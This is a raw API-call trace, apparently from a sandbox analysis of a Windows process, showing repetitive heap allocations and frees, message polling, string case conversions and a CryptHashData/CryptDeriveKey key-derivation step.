0x24b2dc8 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.470] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.470] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.470] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.471] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.471] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.474] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.474] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.474] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0164.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.474] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.474] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.475] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0164.475] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.475] CryptHashData (hHash=0xaa56a0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0164.475] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.476] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.476] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.476] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.476] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.477] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.477] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.477] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.477] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0164.477] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.477] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0164.477] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.477] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.478] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.478] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa56a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0164.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0164.479] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0164.481] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.482] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0164.482] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.482] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0164.482] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 